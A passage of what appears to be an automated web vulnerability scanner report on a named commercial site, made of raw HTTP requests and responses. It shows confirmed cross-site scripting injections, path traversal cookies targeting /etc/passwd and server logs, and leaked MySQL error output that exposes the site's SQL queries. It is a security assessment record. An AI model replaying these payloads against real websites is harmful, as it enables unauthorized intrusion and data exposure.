OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qkcmdn300uddhopd17jsum4ln2; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/

/ppc/leadflow/dima00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005F1)</script>

Request

GET /ppc/leadflow/dima00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F1)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hevstj5bc4e6f87btdbp1b2jc1; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?'"--></style></script><script>alert(0x0005F0..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005F0)</script>

Request

GET /ppc/leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4h0o1ef1iqoib68788v6140l44; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?'"--></style></script><script>alert(0x0005F3..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005F3)</script>

Request

GET /ppc/leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 